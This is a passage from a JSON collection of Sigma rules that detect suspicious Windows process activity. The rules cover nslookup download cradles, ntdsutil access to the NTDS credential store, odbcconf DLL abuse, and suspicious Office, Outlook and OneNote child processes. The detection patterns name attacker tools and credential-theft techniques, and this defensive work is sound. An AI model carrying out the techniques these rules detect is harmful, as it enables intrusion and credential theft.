    "content": "title: Nslookup PowerShell Download Cradle - ProcessCreation\nid: 1b3b01c7-84e9-4072-86e5-fc285a41ff23\nrelated:\n    - id: 72671447-4352-4413-bb91-b85569687135\n      type: obsolete\n    - id: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1\n      type: similar\nstatus: test\ndescription: Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records\nreferences:\n    - https://twitter.com/Alh4zr3d/status/1566489367232651264\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-05\nmodified: 2022-12-19\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|contains: '\\nslookup.exe'\n        - OriginalFileName: '\\nslookup.exe'\n    selection_cmd:\n        ParentImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains:\n            - ' -q=txt '\n            - ' -querytype=txt '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ntdsutil_susp_usage.yml",
    "content": "title: Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)\nid: a58353df-af43-4753-bad0-cd83ef35eef5\nrelated:\n    - id: 2afafd61-6aae-4df4-baed-139fa1f4c345\n      type: derived\nstatus: test\ndescription: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-14\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\ntdsutil.exe'\n        - OriginalFileName: 'ntdsutil.exe'\n    selection_cli:\n        - CommandLine|contains|all:\n              - 'snapshot'\n              - 'mount ' # mounts a specific snapshot - Ex: ntdsutil snapshot \"mount c2b3e2c6-1ffb-4625-ba8e-3503c27a9fcb\" quit quit\n        - CommandLine|contains|all:\n              # This offers more coverage to the \"selection_oneliner_1\" case in rule 8bc64091-6875-4881-aaf9-7bd25b5dda08\n              # The shorest form of \"activate\" can \"ac\". But \"act\", \"acti\"...etc are also valid forms\n              # Same case with the \"instance\" flag\n              - 'ac'\n              - ' i'\n              - ' ntds'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage to restore snapshots\n    - Legitimate admin activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml",
    "content": "title: Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)\nid: 2afafd61-6aae-4df4-baed-139fa1f4c345\nstatus: test\ndescription: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)\nreferences:\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm\nauthor: Thomas Patzke\ndate: 2019-01-16\nmodified: 2022-03-11\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\ntdsutil.exe'\n    condition: selection\nfalsepositives:\n    - NTDS maintenance\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_odbcconf_driver_install.yml",
    "content": "title: Driver/DLL Installation Via Odbcconf.EXE\nid: 3f5491e2-8db8-496b-9e95-1029fce852d4\nrelated:\n    - id: cb0fe7c5-f3a3-484d-aa25-d350a7912729\n      type: similar\nstatus: test\ndescription: Detects execution of \"odbcconf\" with \"INSTALLDRIVER\" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\n    - https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176\n    - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-22\ntags:\n    - attack.defense-evasion\n    - attack.t1218.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\odbcconf.exe'\n        - OriginalFileName: 'odbcconf.exe'\n    selection_cli:\n        # Note: The \"/A\" flag is not required to call a specific action\n        CommandLine|contains|all:\n            - 'INSTALLDRIVER '\n            - '.dll'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate driver DLLs being registered via \"odbcconf\" will generate false positives. Investigate the path of the DLL and its contents to determine if the action is authorized.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml",
    "content": "title: Suspicious Driver/DLL Installation Via Odbcconf.EXE\nid: cb0fe7c5-f3a3-484d-aa25-d350a7912729\nrelated:\n    - id: 3f5491e2-8db8-496b-9e95-1029fce852d4\n      type: derived\nstatus: test\ndescription: Detects execution of \"odbcconf\" with the \"INSTALLDRIVER\" action where the driver doesn't contain a \".dll\" extension. This is often used as a defense evasion method.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\n    - https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176\n    - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-23\ntags:\n    - attack.defense-evasion\n    - attack.t1218.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\odbcconf.exe'\n        - OriginalFileName: 'odbcconf.exe'\n    selection_cli:\n        # Note: The \"/A\" flag is not required to call a specific action\n        CommandLine|contains: 'INSTALLDRIVER '\n    filter_main_dll_ext:\n        CommandLine|contains: '.dll'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml",
    "content": "title: Odbcconf.EXE Suspicious DLL Location\nid: 6b65c28e-11f3-46cb-902a-68f2cafaf474\nstatus: test\ndescription: Detects execution of \"odbcconf\" where the path of the DLL being registered is located in a potentially suspicious location.\nreferences:\n    - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16\n    - https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html\n    - https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-22\nmodified: 2023-05-26\ntags:\n    - attack.defense-evasion\n    - attack.t1218.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\odbcconf.exe'\n        - OriginalFileName: 'odbcconf.exe'\n    selection_cli:\n        # Note: Add more suspicious locations\n        CommandLine|contains:\n            - ':\\PerfLogs\\'\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Registration\\CRMLog'\n            - ':\\Windows\\System32\\com\\dmp\\'\n            - ':\\Windows\\System32\\FxsTmp\\'\n            - ':\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\'\n            - ':\\Windows\\System32\\spool\\drivers\\color\\'\n            - ':\\Windows\\System32\\spool\\PRINTERS\\'\n            - ':\\Windows\\System32\\spool\\SERVERS\\'\n            - ':\\Windows\\System32\\Tasks_Migrated\\'\n            - ':\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\'\n            - ':\\Windows\\SysWOW64\\com\\dmp\\'\n            - ':\\Windows\\SysWOW64\\FxsTmp\\'\n            - ':\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\'\n            - ':\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\'\n            - ':\\Windows\\Tasks\\'\n            - ':\\Windows\\Temp\\'\n            - ':\\Windows\\Tracing\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml",
    "content": "title: New DLL Registered Via Odbcconf.EXE\nid: 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70\nrelated:\n    - id: ba4cfc11-d0fa-4d94-bf20-7c332c412e76\n      type: similar\nstatus: test\ndescription: Detects execution of \"odbcconf\" with \"REGSVR\" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.\nreferences:\n    - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16\n    - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\n    - https://redcanary.com/blog/raspberry-robin/\n    - https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176\n    - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/\n    - https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html\nauthor: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-22\ntags:\n    - attack.defense-evasion\n    - attack.t1218.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\odbcconf.exe'\n        - OriginalFileName: 'odbcconf.exe'\n    selection_cli:\n        # Note: The \"/A\" flag is not required to call a specific action\n        CommandLine|contains|all:\n            - 'REGSVR '\n            - '.dll'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate DLLs being registered via \"odbcconf\" will generate false positives. Investigate the path of the DLL and its content to determine if the action is authorized.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml",
    "content": "title: Potentially Suspicious DLL Registered Via Odbcconf.EXE\nid: ba4cfc11-d0fa-4d94-bf20-7c332c412e76\nrelated:\n    - id: 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70\n      type: derived\nstatus: test\ndescription: Detects execution of \"odbcconf\" with the \"REGSVR\" action where the DLL in question doesn't contain a \".dll\" extension. Which is often used as a method to evade defenses.\nreferences:\n    - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16\n    - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\n    - https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-22\ntags:\n    - attack.defense-evasion\n    - attack.t1218.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\odbcconf.exe'\n        - OriginalFileName: 'odbcconf.exe'\n    selection_cli:\n        # Note: The \"/A\" flag is not required to call a specific action\n        CommandLine|contains: 'REGSVR '\n    filter_main_dll_ext:\n        CommandLine|contains: '.dll'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml",
    "content": "title: Response File Execution Via Odbcconf.EXE\nid: 5f03babb-12db-4eec-8c82-7b4cb5580868\nrelated:\n    - id: 2d32dd6f-3196-4093-b9eb-1ad8ab088ca5\n      type: similar\n    - id: 65d2be45-8600-4042-b4c0-577a1ff8a60e\n      type: obsolete\nstatus: test\ndescription: Detects execution of \"odbcconf\" with the \"-f\" flag in order to load a response file which might contain a malicious action.\nreferences:\n    - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16\n    - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\n    - https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control\n    - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/\nauthor: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-22\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\odbcconf.exe'\n        - OriginalFileName: 'odbcconf.exe'\n    selection_cli:\n        CommandLine|contains|windash: ' -f '\n    selection_rsp_ext:\n        CommandLine|contains: '.rsp'\n    condition: all of selection_*\nfalsepositives:\n    - The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the \".rsp\" file to determine if it is malicious and apply additional filters if necessary.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml",
    "content": "title: Suspicious Response File Execution Via Odbcconf.EXE\nid: 2d32dd6f-3196-4093-b9eb-1ad8ab088ca5\nrelated:\n    - id: 5f03babb-12db-4eec-8c82-7b4cb5580868\n      type: derived\n    - id: 65d2be45-8600-4042-b4c0-577a1ff8a60e\n      type: obsolete\nstatus: test\ndescription: Detects execution of \"odbcconf\" with the \"-f\" flag in order to load a response file with a non-\".rsp\" extension.\nreferences:\n    - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16\n    - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\n    - https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-22\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\odbcconf.exe'\n        - OriginalFileName: 'odbcconf.exe'\n    selection_cli:\n        CommandLine|contains|windash: ' -f '\n    filter_main_rsp_ext:\n        CommandLine|contains: '.rsp'\n    filter_main_runonce_odbc:\n        # When odbcconf is run with the \"/R\" flag, it creates a \"runonce\" key to run at the next reboot\n        ParentImage: 'C:\\Windows\\System32\\runonce.exe'\n        Image: 'C:\\Windows\\System32\\odbcconf.exe'\n        CommandLine|contains: '.exe /E /F \"C:\\WINDOWS\\system32\\odbcconf.tmp\"'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml",
    "content": "title: Uncommon Child Process Spawned By Odbcconf.EXE\nid: 8e3c7994-131e-4ba5-b6ea-804d49113a26\nstatus: test\ndescription: Detects an uncommon child process of \"odbcconf.exe\" binary which normally shouldn't have any child processes.\nreferences:\n    - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16\n    - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\n    - https://medium.com/@cyberjyot/t1218-008-dll-execution-using-odbcconf-exe-803fa9e08dac\nauthor: Harjot Singh @cyb3rjy0t\ndate: 2023-05-22\ntags:\n    - attack.defense-evasion\n    - attack.t1218.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\odbcconf.exe'\n    condition: selection\nfalsepositives:\n    - In rare occurrences where \"odbcconf\" crashes. It might spawn a \"werfault\" process\n    - Other child processes will depend on the DLL being registered by actions like \"regsvr\". In case where the DLLs have external calls (which should be rare). Other child processes might spawn and additional filters need to be applied.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml",
    "content": "title: Potential Arbitrary File Download Using Office Application\nid: 4ae3e30b-b03f-43aa-87e3-b622f4048eed\nrelated:\n    - id: 0c79148b-118e-472b-bdb7-9b57b444cc19\n      type: obsolete\nstatus: test\ndescription: Detects potential arbitrary file download using a Microsoft Office application\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/\n    - https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191\nauthor: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community\ndate: 2022-05-17\nmodified: 2023-06-22\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\EXCEL.EXE'\n              - '\\POWERPNT.EXE'\n              - '\\WINWORD.exe'\n        - OriginalFileName:\n              - 'Excel.exe'\n              - 'POWERPNT.EXE'\n              - 'WinWord.exe'\n    selection_http:\n        CommandLine|contains:\n            - 'http://'\n            - 'https://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml",
    "content": "title: Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp\nid: 551d9c1f-816c-445b-a7a6-7a3864720d60\nstatus: test\ndescription: |\n    Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the \"ActivateMicrosoftApp\" Excel DCOM object.\nreferences:\n    - https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922\n    - https://github.com/grayhatkiller/SharpExShell\n    - https://learn.microsoft.com/en-us/office/vba/api/excel.xlmsapplication\nauthor: Aaron Stratton\ndate: 2023-11-13\ntags:\n    - attack.t1021.003\n    - attack.lateral-movement\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\excel.exe'\n    selection_child:\n        - OriginalFileName:\n          - 'foxprow.exe'\n          - 'schdplus.exe'\n          - 'winproj.exe'\n        - Image|endswith:\n          - '\\foxprow.exe'\n          - '\\schdplus.exe'\n          - '\\winproj.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml",
    "content": "title: Potentially Suspicious Office Document Executed From Trusted Location\nid: f99abdf0-6283-4e71-bd2b-b5c048a94743\nstatus: test\ndescription: Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code.\nreferences:\n    - Internal Research\n    - https://twitter.com/Max_Mal_/status/1633863678909874176\n    - https://techcommunity.microsoft.com/t5/microsoft-365-blog/new-security-hardening-policies-for-trusted-documents/ba-p/3023465\n    - https://twitter.com/_JohnHammond/status/1588155401752788994\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-21\nmodified: 2023-10-18\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        # Note: we add a parent shell to reduce FP. Add additional 3rd party shells that you might use\n        ParentImage|endswith:\n            - '\\explorer.exe'\n            - '\\dopus.exe'\n    selection_img:\n        - Image|endswith:\n              - '\\EXCEL.EXE'\n              - '\\POWERPNT.EXE'\n              - '\\WINWORD.exe'\n        - OriginalFileName:\n              - 'Excel.exe'\n              - 'POWERPNT.EXE'\n              - 'WinWord.exe'\n    selection_trusted_location:\n        CommandLine|contains:\n            # Note: these are the default locations. Admins/Users could add additional ones that you need to cover\n            - '\\AppData\\Roaming\\Microsoft\\Templates'\n            - '\\AppData\\Roaming\\Microsoft\\Word\\Startup\\'\n            - '\\Microsoft Office\\root\\Templates\\'\n            - '\\Microsoft Office\\Templates\\'\n    filter_main_dotx:\n        # Note: We add this filter to avoid curious people clicking on template files\n        CommandLine|endswith:\n            - '.dotx'\n            - '.xltx'\n            - '.potx'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_onenote_embedded_script_execution.yml",
    "content": "title: OneNote.EXE Execution of Malicious Embedded Scripts\nid: 84b1706c-932a-44c4-ae28-892b28a25b94\nstatus: test\ndescription: |\n    Detects the execution of malicious OneNote documents that contain embedded scripts.\n    When a user clicks on a OneNote attachment and then on the malicious link inside the \".one\" file, it exports and executes the malicious embedded script from specific directories.\nreferences:\n    - https://bazaar.abuse.ch/browse/tag/one/\nauthor: '@kostastsale'\ndate: 2023-02-02\ntags:\n    - attack.defense-evasion\n    - attack.t1218.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\onenote.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n        CommandLine|contains:\n            - '\\exported\\'\n            - '\\onenoteofflinecache_files\\'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml",
    "content": "title: Suspicious Microsoft OneNote Child Process\nid: c27515df-97a9-4162-8a60-dc0eeb51b775\nrelated:\n    - id: 438025f9-5856-4663-83f7-52f878a70a50 # Generic rule for suspicious office application child processes\n      type: derived\nstatus: test\ndescription: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.\nreferences:\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18\n    - https://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0\nauthor: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)\ndate: 2022-10-21\nmodified: 2023-02-10\ntags:\n    - attack.t1566\n    - attack.t1566.001\n    - attack.initial-access\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\onenote.exe'\n    selection_opt_img:\n        - OriginalFileName:\n              - 'bitsadmin.exe'\n              - 'CertOC.exe'\n              - 'CertUtil.exe'\n              - 'Cmd.Exe'\n              - 'CMSTP.EXE'\n              - 'cscript.exe'\n              - 'curl.exe'\n              - 'HH.exe'\n              - 'IEExec.exe'\n              - 'InstallUtil.exe'\n              - 'javaw.exe'\n              - 'Microsoft.Workflow.Compiler.exe'\n              - 'msdt.exe'\n              - 'MSHTA.EXE'\n              - 'msiexec.exe'\n              - 'Msxsl.exe'\n              - 'odbcconf.exe'\n              - 'pcalua.exe'\n              - 'PowerShell.EXE'\n              - 'RegAsm.exe'\n              - 'RegSvcs.exe'\n              - 'REGSVR32.exe'\n              - 'RUNDLL32.exe'\n              - 'schtasks.exe'\n              - 'ScriptRunner.exe'\n              - 'wmic.exe'\n              - 'WorkFolders.exe'\n              - 'wscript.exe'\n        - Image|endswith:\n              - '\\AppVLP.exe'\n              - '\\bash.exe'\n              - '\\bitsadmin.exe'\n              - '\\certoc.exe'\n              - '\\certutil.exe'\n              - '\\cmd.exe'\n              - '\\cmstp.exe'\n              - '\\control.exe'\n              - '\\cscript.exe'\n              - '\\curl.exe'\n              - '\\forfiles.exe'\n              - '\\hh.exe'\n              - '\\ieexec.exe'\n              - '\\installutil.exe'\n              - '\\javaw.exe'\n              - '\\mftrace.exe'\n              - '\\Microsoft.Workflow.Compiler.exe'\n              - '\\msbuild.exe'\n              - '\\msdt.exe'\n              - '\\mshta.exe'\n              - '\\msidb.exe'\n              - '\\msiexec.exe'\n              - '\\msxsl.exe'\n              - '\\odbcconf.exe'\n              - '\\pcalua.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\regasm.exe'\n              - '\\regsvcs.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\schtasks.exe'\n              - '\\scrcons.exe'\n              - '\\scriptrunner.exe'\n              - '\\sh.exe'\n              - '\\svchost.exe'\n              - '\\verclsid.exe'\n              - '\\wmic.exe'\n              - '\\workfolders.exe'\n              - '\\wscript.exe'\n    selection_opt_explorer:\n        Image|endswith: '\\explorer.exe'\n        CommandLine|contains:\n            - '.hta'\n            - '.vb'\n            - '.wsh'\n            - '.js'\n            - '.ps'\n            - '.scr'\n            - '.pif'\n            - '.bat'\n            - '.cmd'\n    selection_opt_paths:\n        Image|contains:\n            - '\\AppData\\'\n            - '\\Users\\Public\\'\n            - '\\ProgramData\\'\n            - '\\Windows\\Tasks\\'\n            - '\\Windows\\Temp\\'\n            - '\\Windows\\System32\\Tasks\\'\n    filter_teams:\n        Image|endswith: '\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n        CommandLine|endswith: '-Embedding'\n    filter_onedrive:\n        Image|contains: '\\AppData\\Local\\Microsoft\\OneDrive\\'\n        Image|endswith: '\\FileCoAuth.exe'\n        CommandLine|endswith: '-Embedding'\n    condition: selection_parent and 1 of selection_opt_* and not 1 of filter_*\nfalsepositives:\n    - File located in the AppData folder with trusted signature\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml",
    "content": "title: Outlook EnableUnsafeClientMailRules Setting Enabled\nid: 55f0a3a1-846e-40eb-8273-677371b8d912\nrelated:\n    - id: 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08 # Registry variation\n      type: similar\nstatus: test\ndescription: Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44\n    - https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048\nauthor: Markus Neis, Nasreddine Bencherchali (Nextron Systems)\ndate: 2018-12-27\nmodified: 2023-02-09\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1059\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: '\\Outlook\\Security\\EnableUnsafeClientMailRules'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_outlook_execution_from_temp.yml",
    "content": "title: Suspicious Execution From Outlook Temporary Folder\nid: a018fdc3-46a3-44e5-9afb-2cd4af1d4b39\nstatus: test\ndescription: Detects a suspicious program execution in Outlook temp folder\nauthor: Florian Roth (Nextron Systems)\nreferences:\n    - Internal Research\ndate: 2019-10-01\nmodified: 2022-10-09\ntags:\n    - attack.initial-access\n    - attack.t1566.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains: '\\Temporary Internet Files\\Content.Outlook\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml",
    "content": "title: Suspicious Outlook Child Process\nid: 208748f7-881d-47ac-a29c-07ea84bf691d\nrelated:\n    - id: 438025f9-5856-4663-83f7-52f878a70a50 # Office Child Processes\n      type: derived\n    - id: e212d415-0e93-435f-9e1a-f29005bb4723 # Outlook Remote Child Process\n      type: derived\nstatus: test\ndescription: Detects a suspicious process spawning from an Outlook process.\nreferences:\n    - https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100\n    - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html\nauthor: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team\ndate: 2022-02-28\nmodified: 2023-02-04\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\OUTLOOK.EXE'\n        Image|endswith:\n            - '\\AppVLP.exe'\n            - '\\bash.exe'\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\forfiles.exe'\n            - '\\hh.exe'\n            - '\\mftrace.exe'\n            - '\\msbuild.exe'        # https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\n            - '\\msdt.exe'           # CVE-2022-30190\n            - '\\mshta.exe'\n            - '\\msiexec.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\schtasks.exe'\n            - '\\scrcons.exe'\n            - '\\scriptrunner.exe'\n            - '\\sh.exe'\n            - '\\svchost.exe'        # https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html\n            - '\\wmic.exe'           # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/\n            - '\\wscript.exe'\n            # Several FPs with rundll32.exe\n            # We started excluding specific use cases and ended up commenting out the rundll32.exe sub processes completely\n            # - '\\rundll32.exe'\n            # filter_outlook_photoviewer:  # https://twitter.com/Luke_Hamp/status/1495919717760237568\n            #   ParentImage|endswith: '\\OUTLOOK.EXE'\n            #   Image|endswith: '\\rundll32.exe'\n            #   CommandLine|contains: '\\PhotoViewer.dll'\n            # filter_outlook_printattachments:  # https://twitter.com/KickaKamil/status/1496238278659485696\n            #   ParentImage|endswith: '\\OUTLOOK.EXE'\n            #   Image|endswith: '\\rundll32.exe'\n            #   